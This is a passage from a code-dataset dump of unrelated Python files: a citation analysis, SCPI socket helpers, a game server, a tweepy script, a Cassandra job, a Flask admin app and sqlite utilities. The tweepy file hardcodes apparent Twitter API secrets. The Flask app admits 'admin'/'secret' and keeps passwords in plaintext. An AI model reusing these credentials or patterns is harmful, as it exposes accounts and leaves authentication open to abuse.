\"../dataset/COVID19_papers_modeling_with_features.csv\"\n covid19_paper_df = pd.read_csv(covid19_papers_modeling_filename)\n \n # flu\n flu_papers_modeling_filename = \"../dataset/FLU_papers_modeling_with_features.csv\"\n flu_paper_df = pd.read_csv(flu_papers_modeling_filename)\n\n print(\"Cleaning data...\")\n # COVID19\n citation_count_replaced = covid19_paper_df['citation_count'].replace(-1,np.nan)\n covid19_paper_df = covid19_paper_df.assign(citation_count = citation_count_replaced)\n\n # replace average topic distr similarity -1 as nan\n # value of -1 means zero or one authors have abstracts available\n avg_tdsim_replaced = covid19_paper_df['avg_tdsim'].replace(-1, np.nan)\n covid19_paper_df = covid19_paper_df.assign(avg_tdsim = avg_tdsim_replaced)\n\n # flu paper\n cultural_sim_replaced = flu_paper_df['cultural_similarity'].replace(-1,np.nan)\n flu_paper_df = flu_paper_df.assign(cultural_similarity = cultural_sim_replaced)\n\n print(\"Log transforming...\")\n # COVID19\n team_size_log_transformed = np.log(covid19_paper_df['team_size']+1)\n max_hindex_log_transformed = np.log(covid19_paper_df['max_hindex']+1)\n citation_count_log_transformed = np.log(covid19_paper_df['citation_count']+1)\n citation_per_month_log_transformed = np.log(covid19_paper_df['citation_per_month']+1)\n\n covid19_paper_df = covid19_paper_df.assign(team_size_log = team_size_log_transformed)\n covid19_paper_df = covid19_paper_df.assign(max_hindex_log = max_hindex_log_transformed)\n covid19_paper_df = covid19_paper_df.assign(citation_count_log = citation_count_log_transformed)\n covid19_paper_df = covid19_paper_df.assign(citation_per_month_log = citation_per_month_log_transformed)\n\n # flu\n team_size_log_transformed = np.log(flu_paper_df['team_size']+1)\n max_hindex_log_transformed = np.log(flu_paper_df['max_hindex']+1)\n citation_count_log_transformed = np.log(flu_paper_df['citation_count']+1)\n citation_per_month_log_transformed = np.log(flu_paper_df['citation_per_month']+1)\n\n flu_paper_df = flu_paper_df.assign(team_size_log = team_size_log_transformed)\n flu_paper_df = flu_paper_df.assign(max_hindex_log = max_hindex_log_transformed)\n flu_paper_df = flu_paper_df.assign(citation_count_log = citation_count_log_transformed)\n flu_paper_df = flu_paper_df.assign(citation_per_month_log = citation_per_month_log_transformed)\n\n # get dummy variables for publish month\n publish_month_dummy = pd.get_dummies(covid19_paper_df.publish_month_text)\n publish_month_dummy.columns = [\"publish_{}\".format(c) for c in publish_month_dummy.columns]\n covid19_paper_df = covid19_paper_df.assign(**publish_month_dummy)\n publish_month_columns = list(publish_month_dummy.columns)\n publish_month_columns.remove(\"publish_Aug\")\n publish_month_columns.remove(\"publish_Sep\")\n\n publish_month_dummy = pd.get_dummies(flu_paper_df.publish_month_text)\n publish_month_dummy.columns = [\"publish_{}\".format(c) for c in publish_month_dummy.columns]\n flu_paper_df = flu_paper_df.assign(**publish_month_dummy)\n publish_month_columns = list(publish_month_dummy.columns)\n publish_month_columns.remove(\"publish_Sep\")\n publish_month_columns.remove(\"publish_Aug\")\n\n # define variables\n control_var = [\"avg_tdsim\", \"new_tie_rate\", \"hindex_gini\",\"cultural_similarity\", \"topic_familiarity_var\", \"max_hindex_log\", \"team_size_log\", \"prac_affil_rate\"] + publish_month_columns + [\"topic_distr{}\".format(i) for i in range(1,20)]\n predictor_var = \"topic_familiarity\"\n\n # drop NA rows\n # COVID19\n covid19_paper_df = covid19_paper_df.dropna(subset=[predictor_var] + control_var + [\"citation_per_month\", \"citation_per_month_binary_10perc\", \"citation_per_month_binary_5perc\", \"citation_per_month_binary_1perc\"])\n print(\"Number of COVID papers: {}\".format(covid19_paper_df.shape[0]))\n\n # flu\n flu_paper_df = flu_paper_df.dropna(subset=[predictor_var] + control_var + [\"citation_per_month\", \"citation_per_month_binary_10perc\", \"citation_per_month_binary_5perc\", \"citation_per_month_binary_1perc\"])\n print(\"Number of flu papers: {}\".format(flu_paper_df.shape[0]))\n\n print(\"Creating matching variable...\")\n # match on journals\n covid19_journals = covid19_paper_df.journal.str.lower().str.strip()\n covid19_paper_df = covid19_paper_df.assign(journal = covid19_journals)\n\n flu_journals = flu_paper_df.publication_name.str.lower().str.strip()\n flu_paper_df = flu_paper_df.assign(journal = flu_journals)\n\n random.seed(100)\n\n matched_flu_scopusid = []\n matched_covid19_uid = []\n for idx, flu_paper in flu_paper_df.iterrows():\n flu_journal = flu_paper.journal\n matched_covid19_paper = covid19_paper_df[covid19_paper_df.journal == flu_journal]\n if matched_covid19_paper.shape[0] != 0:\n new_matched_covid19_paper = [p for p in matched_covid19_paper.cord_uid.values if p not in matched_covid19_uid]\n if len(new_matched_covid19_paper) != 0:\n sampled_covid19_match = random.choice(new_matched_covid19_paper)\n\n matched_flu_paper = flu_paper_df.iloc[idx].scopus_id\n matched_flu_scopusid.append(matched_flu_paper)\n matched_covid19_uid.append(sampled_covid19_match)\n\n print(\"Generating covid indicator variable...\")\n covid19_matched = covid19_paper_df[covid19_paper_df.cord_uid.isin(matched_covid19_uid)]\n covid19_matched.reset_index(drop=True, inplace=True)\n covid19_matched = covid19_matched.assign(covid19=int(1))\n\n flu_matched = flu_paper_df[flu_paper_df.scopus_id.isin(matched_flu_scopusid)]\n flu_matched.reset_index(drop=True, inplace=True)\n flu_matched = flu_matched.assign(covid19=int(0))\n\n # Combine covid and flu papers\n covid19_matched = covid19_matched[[predictor_var] + control_var + [\"covid19\", \"citation_per_month_log\", \"citation_per_month_binary_20perc\", \"citation_per_month_binary_10perc\", \"citation_per_month_binary_5perc\"]]\n flu_matched = flu_matched[[predictor_var] + control_var + [\"covid19\", \"citation_per_month_log\", \"citation_per_month_binary_20perc\", \"citation_per_month_binary_10perc\", \"citation_per_month_binary_5perc\"]]\n combined_papers = pd.concat([covid19_matched, flu_matched])\n print(\"Number of matched samples: {}\".format(combined_papers.shape[0]))\n\n # Standardize\n standardize_columns = [predictor_var] + [\"avg_tdsim\", \"new_tie_rate\", \"hindex_gini\",\"cultural_similarity\", \"topic_familiarity_var\", \"max_hindex_log\", \"team_size_log\", \"prac_affil_rate\"] + [\"topic_distr{}\".format(i) for i in range(1,20)]\n X = np.array(combined_papers[standardize_columns])\n X_scaled = scale(X)\n\n combined_papers_scaled = combined_papers.copy()\n combined_papers_scaled[standardize_columns] = X_scaled\n\n ## Effect of topic familiarity\n binary_citation_20perc_tf_model = cem_test(0.2, \"topic_familiarity\", combined_papers_scaled, [predictor_var] + control_var)\n binary_citation_10perc_tf_model = cem_test(0.1, \"topic_familiarity\", combined_papers_scaled, [predictor_var] + control_var)\n binary_citation_5perc_tf_model = cem_test(0.05, \"topic_familiarity\", combined_papers_scaled, [predictor_var] + control_var)\n \n # export data for plotting.\n combined_papers_scaled.to_csv(\"../results/updated_results/cem_test_interaction_journal_data_exported.csv\", index=False)\n\n","sub_path":"src/cem_test_binary_citation_journal.py","file_name":"cem_test_binary_citation_journal.py","file_ext":"py","file_size_in_byte":9149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"27537094","text":"# Python SCPI socket functions\r\n\r\n\r\n\r\nimport socket\r\n\r\ndef SCPI_sock_connect(ipaddress,port=57732):\r\n \"\"\" Opens up a socket connection between an instrument and your PC\r\n Returns the socket session\r\n\r\n Arguments:\r\n ipaddress -> ip address of the instrument\r\n port -> optional -> socket port of the instrument (default 5025)\"\"\"\r\n\r\n try:\r\n session=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n session.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 0)\r\n session.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, 0)\r\n session.connect((ipaddress,port))\r\n except IOError:\r\n\t print (\"Failed to connect to the instrument, pleace check your IP address\")\r\n\t#return\r\n return session\r\n\r\ndef SCPI_sock_send(session,command,error_check=False):\r\n \"\"\"Sends a command to an instrument\r\n\r\n Arguments:\r\n session -> TCPIP socket connection\r\n command -> text containing an instrument command\r\n error_check -> optional -> Check for instrument errors (default False)\"\"\"\r\n \r\n resp = \" \"\r\n message=command + \"\\r\\n\"\r\n message=message.encode('ascii', 'ignore')\r\n session.sendall(message)\r\n\r\n if error_check==True:\r\n err = get_error(session, command) \r\n \r\n#def SCPI_sock_query(session,command,error_check=False):\r\n# \"\"\"Sends a query to an instrument\r\n# Returns the query response\r\n# \r\n# Arguments:\r\n# session -> TCPIP socket connection\r\n# command -> text containing an instrument command\r\n# error_check -> optional -> Check for instrument errors (default False)\"\"\"\r\n# \r\n# session.settimeout(2.0)\r\n# try:\r\n# session.sendall(command + \"\\n\")\r\n# response = getDataFromSocket(session)\r\n# if error_check==True:\r\n# err = get_error(session, command)\r\n# if err:\r\n# response = \"\"\r\n# return response\r\n# \r\n# except socket.timeout:\r\n# print \"Query error:\"\r\n# get_error(session, command)\r\n# response = \"\"\r\n# return response\r\n#\r\ndef SCPI_sock_close(session):\r\n \"\"\"Closes the socket connection\r\n\r\n Argument:\r\n session -> TCPIP socket connection\"\"\"\r\n \r\n session.close()\r\n#\r\ndef getDataFromSocket(session):\r\n \"\"\"Reads from a socket until a newline is read\r\n Returns the data read\r\n\r\n Argument:\r\n session -> TCPIP socket\"\"\"\r\n \r\n dat = \"\"\r\n while 1:\r\n message = session.recv(4096)\r\n last=len(message)\r\n if message[last-1] == \"\\n\":\r\n dat=dat+message[:-1]\r\n return dat\r\n else:\r\n dat=dat+message\r\n#\r\n#def get_error(session, command):\r\n# \"\"\"Checks an instrument for errors and print them out\r\n# Returns True if any errors are encountered\r\n#\r\n# Arguments:\r\n# session -> TCPIP socket connection\r\n# command -> text containing an instrument command\"\"\"\r\n# \r\n# has_err=False\r\n# resp = SCPI_sock_query(session,\"SYST:ERR?\")\r\n# \r\n# if int(resp[:2]) != 0:\r\n# print \"Your command: \" + command + \" has errors:\"\r\n# print resp\r\n# has_err = True\r\n# while int(resp[:2]) != 0:\r\n# resp=SCPI_sock_query(session,\"SYST:ERR?\")\r\n# if int(resp[:2]) != 0:\r\n# print resp\r\n#\r\n# return has_err\r\n","sub_path":"SCPI_socket.py","file_name":"SCPI_socket.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"645013285","text":"# -*- coding: utf-8 -*-\n\n\n\"\"\"Serveur de jeu temps réel Pooo\n \n\"\"\"\n\nimport socketserver\nimport socket\nimport threading\nimport logging\nimport re\n\nROOM_SIZE=4\n\nfrom pooogame import Room, Contest, Player\n\n\nBUFSIZE=2048\n\nHOST, PORT = \"localhost\", 9876\n\n\n#LOG_FILENAME=\n#LEVELS = { 'debug':logging.DEBUG,\n# 'info':logging.INFO,\n# 'warning':logging.WARNING,\n# 'error':logging.ERROR,\n# 'critical':logging.CRITICAL,\n# }\nlogging.basicConfig(level=logging.DEBUG)\n\n\n\nclass PoooHandler(socketserver.BaseRequestHandler):\n \"\"\"callback du serveur lorsqu'il enregistre une nouvelle connexion (un nouveau client) \n \n \"\"\"\n \n def handle(self):\n self.request.set_inheritable(True) # tricks pour la version python 3.4 (3 jours de debug...)\n # register new player\n p=Player(self.request, self.client_address, self.server.engage)\n p.start()\n self.server.join(p) \n return\n \n \n\nclass PoooServer(socketserver.ThreadingMixIn, socketserver.TCPServer):\n engage=threading.Event() # set when a contest is created from current room (then reseted)\n contests=[]\n room=None\n \n @property\n def load(self):\n return len(self.contests)\n \n def join(self, player):\n room.join(player)\n\n\ndef fucking_failing_main():\n server = PoooServer((HOST, PORT), PoooHandler)\n room=Room(server)\n room.start()\n \n # Démarre un thread pour le serveur -- chaque nouvelle connexion entrante\n # démarre un nouveau thread également\n server_thread = threading.Thread(name='Pooo server', target=server.serve_forever)\n server_thread.daemon = True\n server_thread.start()\n logging.info(\"{} up and running at {}:{}\".format(server_thread.name, HOST, PORT))\n\n try: \n server_thread.join()\n except KeyboardInterrupt:\n logging.warning('Ctr-C Stop server\\n')\n\n\nclass Server:\n lock = threading.Lock()\n engage=threading.Event()\n contests = []\n \n @property\n def load(self):\n return len(self.contests) \n \n\ndef main(): # version avec socket bloquante, mais au moins ça fonctionne !\n server=Server()\n room = Room(server, ROOM_SIZE)\n room.start()\n\n ssock = socket.socket()\n ssock.bind(('', 9876))\n ssock.listen(ROOM_SIZE*3)\n while True:\n try: \n sock, addr = ssock.accept() \n with server.lock:\n # register new player\n sock.set_inheritable(True) # tricks pour la version python 3.4\n p=Player(sock, addr, server.engage)\n p.start()\n room.join(p) \n \n except KeyboardInterrupt:\n print('Ctrl C')\n ssock.close()\n break\n \n\nif __name__ == \"__main__\": \n main()\n","sub_path":"poooserver.py","file_name":"poooserver.py","file_ext":"py","file_size_in_byte":2874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"587928258","text":"from time import sleep\nimport tweepy\nfrom tweepy import OAuthHandler\n\nckey = \"H5j0EojWWqEBWpsnnwrayYXpW\"\ncsecret = \"rVyGkfa6QNAKN80iLxBgbps7GzJRGr4jhBWUP8FBR1RMroKxgp\"\natoken = \"45212834-fCrnR0AII4yFSQ0n57HIlSIoOzH2hdT0QOcFkfiB2\"\nasecret = \"xQDG9X6DyaCBGlejGeZC9vLbF505wejN5eDR6UxhUyTjb\"\n\nauth = OAuthHandler(ckey, csecret)\nauth.set_access_token(atoken, asecret)\nauth.secure = True\napi = tweepy.API(auth)\n\n\nfor tweet in tweepy.Cursor(api.search, q=\"besiktas\", lang=\"en\").items(10):\n\n try:\n print(\"Tweet sent by: @\" + tweet.user.screen_name)\n\n except tweepy.TweepError as e:\n print(e.reason)\n sleep(10)\n continue\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"520822727","text":"from multiprocessing.pool import ThreadPool\nfrom functools import partial\nfrom collections import defaultdict\nimport time\n\nfrom transactions.new_order import populate_related_customers\nfrom transactions.utils import *\n\n\ncounter = 0\nstart_time = 0\n\n\ndef work(session, cql, bucket, order):\n global counter\n global start_time\n global interval1\n global interval2\n time1 = time.time()\n for i in bucket[(order.o_w_id, order.o_d_id, order.o_id)]:\n do_query(session, cql, (order.o_w_id, i, order.o_id, order.o_d_id, order.o_c_id), 'write')\n populate_related_customers(session, order.o_w_id, order.o_d_id, order.o_c_id, bucket[(order.o_w_id, order.o_d_id, order.o_id)])\n counter += 1\n if counter % 100 == 0:\n batch_time = time.time()\n elapsed = batch_time - start_time\n throughput = counter * 1.0 / elapsed\n print(\"number of preprocessed orders: \", counter)\n print(\"throughput: %s orders per second\" % (\"{:.2f}\".format(throughput)))\n\n\ndef preprocess_related_customer(session):\n global start_time\n bucket = defaultdict(list)\n time1 = time.time()\n orders = session.execute('SELECT O_W_ID, O_D_ID, O_ID, O_C_ID FROM orders')\n order_lines = session.execute('SELECT OL_W_ID, OL_D_ID, OL_O_ID, OL_I_ID FROM order_line')\n for ol in order_lines:\n bucket[(ol.ol_w_id, ol.ol_d_id, ol.ol_o_id)].append(ol.ol_i_id)\n time2 = time.time()\n print(\"Time to fetch all order lines: %s seconds\" % (\"{:.2f}\".format(time2 - time1)))\n pool = ThreadPool(16)\n start_time = time.time()\n cql = session.prepare(\"INSERT INTO item_orders (W_ID, I_ID, O_ID, D_ID, C_ID) VALUES (?, ?, ?, ?, ?)\")\n pool.map(partial(work, session, cql, bucket), orders)\n\n","sub_path":"cassandra/src/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"631060337","text":"from flask import Flask, render_template, redirect, url_for, request, flash\n\nimport os\n\nfrom root.dao.database import Database\nfrom root.dao.orm.model import *\n\nfrom root.forms.user import *\nfrom root.forms.category import *\nfrom root.forms.messenger import *\nfrom root.forms.message import *\n\n\n\napp = Flask(__name__)\n\nSECRET_KEY = os.urandom(24)\napp.config['SECRET_KEY'] = SECRET_KEY\n\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'postgres://qhsmovulrcixsq:4de2d87cc269e6e20a3b9d3a3cafd5b28eb5deb674a965ccb74db00dffc5e9f8@ec2-174-129-255-11.compute-1.amazonaws.com:5432/dd8urtd5qotins'\n\ndb = Database()\n\n\nBase.metadata.create_all(db.sqlalchemy_engine)\nsession = db.sqlalchemy_session\n\n@app.route('/', methods = ['GET', 'POST'])\ndef login():\n\n error = None\n form = LoginForm()\n\n\n if request.method == 'POST':\n user = request.form['username']\n users = list(db.sqlalchemy_session.query(Users.display_name, Users.password).filter(\n Users.display_name == user))\n\n\n if user == 'admin' and \\\n request.form['password'] == 'secret':\n return redirect(url_for('admin'))\n\n elif not users:\n error = 'Такой пользователь не существует: введите данные правильно или регистрируйтесь.'\n elif request.form['password'] != users[0][1]:\n error = 'Неправильный логин или пароль.'\n\n else:\n flash('Вы успешно ввошли!')\n return redirect(url_for('client', username=user))\n\n return render_template('login.html', error = error, form = form)\n\n@app.route('/register', methods = ['GET', 'POST'])\ndef register():\n\n error = None\n form = UserForm(request.form)\n\n\n if request.method == 'POST' and form.validate():\n\n user = list(db.sqlalchemy_session.query(Users.display_name, Users.password).filter(\n Users.display_name == request.form['username']))\n\n if user:\n\n error = 'Такой пользователь уже существует: придумайте другой username'\n else:\n\n user = Users(display_name = request.form['username'], password = request.form['password'], location = request.form['location'])\n db.createUser(user)\n flash('Спасибо за регистрацию')\n\n return redirect(url_for('login'))\n\n return render_template('userForm.html', form=form, tittle='Регистрация', error=error)\n\n\n@app.route('/', methods = ['GET', 'POST'])\ndef client(username):\n\n client_id = list(db.sqlalchemy_session.query(Users.user_id).filter(Users.display_name == username))[0][0]\n client_message = list(db.sqlalchemy_session.query(Message).filter(Message.user_fk == client_id))\n\n form = messageClientForm(request.form)\n form.messenger.choices = [(messenger.messenger_name, messenger.messenger_name) for messenger in db.sqlalchemy_session.query(Messenger).all()]\n form.category.choices = [(category.category_name, category.category_name) for category in db.sqlalchemy_session.query(Category).all()]\n\n if request.method == 'POST' and form.validate():\n user = list(db.sqlalchemy_session.query(Users.user_id).filter(Users.display_name==username))[0][0]\n tittle = form.tittle.data\n body = form.body.data\n messenger = list(db.sqlalchemy_session.query(Messenger.messenger_id).filter(Messenger.messenger_name==request.form['messenger']))[0][0]\n category = list(db.sqlalchemy_session.query(Category.category_id).filter(Category.category_name==request.form['category']))[0][0]\n\n message = Message(user_fk=user, tittle=tittle, body=body, messenger_fk=messenger, category_fk=category)\n db.createMessage(message)\n return redirect(url_for('client', username=username))\n\n return render_template('client.html', client=username, messages = client_message, form=form)\n\n\n\n@app.route('/admin')\ndef admin():\n return render_template('admin_base.html')\n\n\n@app.route('/admin/user')\ndef users():\n all_users = db.fetchAllUsers()\n return render_template('user.html', all_users=all_users)\n\n@app.route('/admin/user/delete_user/')\ndef delete_user(user_id):\n db.deleteUser(user_id)\n return redirect(url_for(\"users\"))\n\n@app.route('/admin/user/edit/', methods = [\"GET\", \"POST\"])\ndef update_user(user_id):\n\n error = None\n\n user_data = db.fetchUser(user_id)\n\n form = UserUpdateForm(request.form, username = user_data.display_name, location = user_data.location)\n\n if request.method == \"POST\" and form.validate():\n\n username = form.username.data\n\n same_user = list(db.sqlalchemy_session.query(Users).filter(Users.display_name == request.form['username']))\n\n if same_user and username != user_data.display_name:\n error = 'Такой пользователь уже существует'\n else:\n\n if request.form['password'] == '':\n password = user_data.password\n else:\n password = form.password.data\n\n location = form.location.data\n\n db.updateUser(user_id, display_name=username, password=password, location=location)\n\n return redirect(url_for(\"users\"))\n\n\n return render_template(\"userUpdateForm.html\", form=form, tittle = 'Изменить пользователя', error = error)\n\n@app.route('/admin/user/create_new_user', methods = [\"GET\", \"POST\"])\ndef create_user():\n\n error = None\n form = UserForm(request.form)\n\n\n if request.method == \"POST\" and form.validate():\n\n user = list(db.sqlalchemy_session.query(Users.display_name, Users.password).filter(\n Users.display_name == request.form['username']))\n\n if user:\n error = 'Такой пользователь уже существует: придумайте другой username'\n else:\n user = Users(display_name=request.form['username'], password=request.form['password'],\n location=request.form['location'])\n db.createUser(user)\n\n return redirect(url_for('users'))\n\n\n return render_template('userForm.html', form=form, tittle='Создать нового пользователя', error = error)\n\n@app.route('/admin/category')\ndef category():\n all_category = db.fetchAllCategory()\n return render_template('category.html', all_category=all_category)\n\n@app.route('/admin/category/delete_category/')\ndef delete_category(category_id):\n db.deleteCategory(category_id)\n return redirect(url_for(\"category\"))\n#\n@app.route('/admin/category/edit/', methods = [\"GET\", \"POST\"])\ndef update_category(category_id):\n\n error = None\n category_data = db.fetchCategory(category_id)\n\n\n form = CategoryForm(request.form,\\\n category_name = category_data.category_name,\n amount = category_data.population_count )\n\n if request.method == \"POST\" and form.validate():\n\n categories = list(db.sqlalchemy_session.query(Category.category_name).\n filter(Category.category_name == request.form['category_name']))\n\n if categories and request.form['category_name'] != category_data.category_name:\n error = 'Такая категория уже существует'\n else:\n\n category_name = form.category_name.data\n amount = form.amount.data\n db.updateCategory(category_id, category_name, amount)\n return redirect(url_for(\"category\"))\n\n return render_template(\"categoryForm.html\", form=form, tittle = 'Изменить категорию', error = error)\n\n@app.route('/admin/category/create_new_category', methods = [\"GET\", \"POST\"])\ndef create_category():\n\n error = None\n\n form = CategoryForm(request.form)\n\n if request.method == \"POST\" and form.validate():\n\n categories = list(db.sqlalchemy_session.query(Category.category_name).\n filter(Category.category_name == request.form['category_name']))\n\n if categories:\n error = 'Такая категория уже существует'\n else:\n category_name = form.category_name.data\n amount = form.amount.data\n category = Category(category_name=category_name, population_count=amount)\n db.createCategory(category)\n\n return redirect(url_for(\"category\"))\n\n return render_template(\"categoryForm.html\", form=form, tittle = 'Создать новую категорию', error = error)\n\n\n@app.route('/admin/messenger')\ndef messengers():\n all_messengers = db.fetchAllMessenger()\n return render_template('messenger.html', all_messengers=all_messengers)\n\n\n@app.route('/admin/messenger/delete_messenger/')\ndef delete_messenger(messenger_id):\n db.deleteMessenger(messenger_id)\n return redirect(url_for(\"messengers\"))\n\n@app.route('/admin/messenger/edit_messenger/', methods=['POST', 'GET'])\ndef update_messenger(messenger_id):\n error = None\n\n messenger_data = db.fetchMessenger(messenger_id)\n\n form = MessengerForm(request.form,\n messenger_name=messenger_data.messenger_name)\n\n if request.method == 'POST' and form.validate():\n\n same_messenger = list(db.sqlalchemy_session.query(Messenger).\n filter(Messenger.messenger_name == request.form['messenger_name']))\n if same_messenger and request.form['messenger_name'] != messenger_data.messenger_name:\n error = 'Такая категория уже существует'\n else:\n messenger_name = form.messenger_name.data\n\n db.updateMessenger(messenger_id, messenger_name)\n return redirect(url_for('messengers'))\n\n return render_template('messengerForm.html', form = form, tittle = 'Изменить messenger', error=error)\n\n@app.route('/admin/messenger/create_new_messenger', methods = [\"GET\", \"POST\"])\ndef create_messenger():\n\n error = None\n\n form = MessengerForm(request.form)\n\n if request.method == \"POST\" and form.validate():\n\n same_messenger = list(db.sqlalchemy_session.query(Messenger).\n filter(Messenger.messenger_name == request.form['messenger_name']))\n\n if same_messenger:\n error = 'Такая категория уже существует'\n else:\n messenger_name = form.messenger_name.data\n messenger = Messenger(messenger_name=messenger_name)\n db.createMessenger(messenger)\n\n return redirect(url_for(\"messengers\"))\n\n return render_template(\"messengerForm.html\", form=form, tittle = 'Создать новый messenger', error=error)\n\n@app.route('/admin/messages')\ndef messages():\n all_messages = db.fetchAllMessages()\n all_users = db.fetchAllUsers()\n all_messengers = db.fetchAllMessenger()\n all_categories = db.fetchAllCategory()\n\n return render_template('messages.html', all_messages=all_messages, all_users = all_users, all_messengers = all_messengers, all_categories\n =all_categories)\n\n@app.route('/admin/messages/delete/')\ndef delete_message(message_id):\n db.deleteMessage(message_id)\n return redirect(url_for('messages'))\n\n\n@app.route('/admin/messages/edit/', methods = ['POST', 'GET'])\ndef update_message(message_id):\n\n error = None\n\n message_data = db.fetchMessage(message_id)\n\n\n user_name = list(db.sqlalchemy_session.query(Users.display_name).filter(Users.user_id == message_data.user_fk))\n\n if user_name:\n user_name = user_name[0][0]\n else:\n user_name = ''\n\n if message_data.messenger_fk is not None:\n messenger_name = list(db.sqlalchemy_session.query(Messenger.messenger_name).filter(\n Messenger.messenger_id == message_data.messenger_fk))[0][0]\n else:\n messenger_name = None\n\n\n if message_data.category_fk is not None:\n category_name = list(db.sqlalchemy_session.query(Category.category_name).filter(\n Category.category_id == message_data.category_fk))[0][0]\n else:\n category_name = None\n\n\n form = messageUpdateForm(request.form, messenger = messenger_name, category = category_name)\n\n form.messenger.choices =[(messenger.messenger_name, messenger.messenger_name) for messenger in db.sqlalchemy_session.query(Messenger).all()]\n form.category.choices = [(category.category_name, category.category_name) for category in db.sqlalchemy_session.query(Category).all()]\n\n\n if request.method == 'POST' and form.validate():\n\n if request.form['messenger'] is None:\n messenger_id = None\n else:\n messenger_id = list(db.sqlalchemy_session.query(Messenger.messenger_id).filter(\n Messenger.messenger_name == request.form['messenger']))[0][0]\n\n categories = list(db.sqlalchemy_session.query(Category.category_id).filter(\n Category.category_name == request.form['category']))\n\n if categories:\n category_id = categories[0][0]\n else:\n category_id = None\n\n db.updateMessage_second(message_id=message_id, messenger = messenger_id, category = category_id)\n return redirect(url_for('messages'))\n\n return render_template('messageUpdateForm.html', form=form, data = message_data, user = user_name, error=error)\n\n\n\n\n@app.route('/admin/messages/create_new_message', methods = [\"GET\", \"POST\"])\ndef create_message():\n\n error = []\n\n form = messageCreateForm(request.form)\n\n form.user.choices = [(user.display_name, user.display_name)\n for user in db.sqlalchemy_session.query(Users).all()]\n form.messenger.choices = [(messenger.messenger_name, messenger.messenger_name)\n for messenger in db.sqlalchemy_session.query(Messenger).all()]\n form.category.choices = [(category.category_name, category.category_name)\n for category in db.sqlalchemy_session.query(Category).all()]\n\n if request.method == \"POST\" and form.validate():\n\n user = list(db.sqlalchemy_session.query(Users.user_id).filter(Users.display_name == request.form['user']))[0][0]\n tittle = form.tittle.data\n body = form.body.data\n messenger = list(db.sqlalchemy_session.query(Messenger.messenger_id).filter(Messenger.messenger_name == request.form['messenger']))[0][0]\n category = list(db.sqlalchemy_session.query(Category.category_id).filter(Category.category_name == request.form['category']))[0][0]\n\n message = Message(tittle=tittle, body=body, user_fk=user, messenger_fk=messenger, category_fk=category)\n db.createMessage(message)\n return redirect(url_for(\"messages\"))\n\n return render_template(\"messageForm.html\", form=form, tittle = 'Создать новое сообщение', error = error)\n\n# @app.route('/dashboard')\n# def dashboard():\n# # message_data = db.fetchAllMessages()\n# # messager_id = []\n# # clicks = []\n# #\n# # for message in message_data:\n# # messager_id.append(message.messenger)\n# # clicks.append(message.count_clicks)\n# #\n# # bar = go.Bar(\n# # x = messager_id,\n# # y =clicks\n# # )\n#\n# catagory_data = db.fetchAllCatagory()\n# catagory_name = []\n# population = []\n#\n# for catagory in catagory_data:\n# catagory_name.append(catagory.catagory_name)\n# population.append(catagory.population)\n#\n# pie = go.Pie(\n# labels = catagory_name,\n# values = population\n# )\n#\n# attach_data = db.fetchAllAttaches()\n# attach_name = []\n# attach_size = []\n#\n# for attach in attach_data:\n# attach_name.append(attach.name)\n# attach_size.append(attach.size)\n#\n# bar = go.Bar(\n# x=attach_name,\n# y=attach_size\n# )\n#\n# data = {\n# \"bar\": [bar],\n# \"pie\": [pie]\n# }\n#\n#\n#\n# graphsJSON = json.dumps(data, cls=plotly.utils.PlotlyJSONEncoder)\n# return render_template(\"dashboard.html\", graphsJSON=graphsJSON)\n\nif __name__ == '__main__':\n app.run(debug=True)","sub_path":"root/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":16298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"556332902","text":"import sqlite3\n\ndatabase = ('data/movements.db')\n\ndef inicialVerification():\n #Comprobamos si la DB está vacía o informada\n conn = sqlite3.connect(database)\n cursor = conn.cursor()\n\n query = '''\n SELECT count (*) FROM cryptos;\n '''\n cursor.execute(query)\n n=cursor.fetchone()\n conn.close()\n if n[0]==0:\n return False\n else:\n return True\n\ndef CryptosDBInformed(cryptos):\n #Guadamos las cryptos obtenidas de la API en DBcryptos\n conn = sqlite3.connect(database)\n cursor = conn.cursor()\n\n query='''\n INSERT into cryptos\n (symbol, name)\n values (?, ?);\n '''\n\n try:\n for i in range (len(cryptos)):\n rows=cursor.execute(query, (cryptos[i][0], cryptos[i][1]))\n except sqlite3.Error as e:\n print('Error en sqlite:', e)\n \n conn.commit()\n conn.close()\n\ndef listCryptosIni():\n #Entrega symbol y nombre de la moneda Euros para la primera operación debido a que la tabla To_Currency está vacia---------------\n conn = sqlite3.connect(database)\n cursor = conn.cursor()\n\n query = '''\n SELECT symbol, name\n FROM cryptos \n WHERE cryptos.id=13;\n '''\n rows=cursor.execute(query)\n cryptosInverts=[]\n text=''\n\n for row in rows:\n text= '{} - {}'.format(row[0], row[1])\n cryptosInverts.append(text)\n\n conn.close()\n return cryptosInverts\n\ndef listCryptos():\n #Entrega lista con symbol y nombre de cryptos que hay en DBcryptos\n conn = sqlite3.connect(database)\n cursor = conn.cursor()\n\n query = '''\n SELECT symbol, name FROM cryptos ORDER BY symbol;\n '''\n rows=cursor.execute(query)\n cryptos=[]\n text=''\n for row in rows:\n text= '{} - {}'.format(row[0], row[1])\n cryptos.append(text)\n \n conn.close()\n return cryptos\n\ndef listCryptosInvert():\n #Entrega lista con symbol y nombre de cryptos en las que ya se ha invertido mas los Euros\n conn = sqlite3.connect(database)\n cursor = conn.cursor()\n\n query = '''\n SELECT DISTINCT symbol, name\n FROM cryptos INNER JOIN movements\n WHERE to_currency= cryptos.id OR cryptos.id=13 ORDER BY symbol;\n '''\n rows=cursor.execute(query)\n cryptosInverts=[]\n text=''\n for row in rows:\n text= '{} - 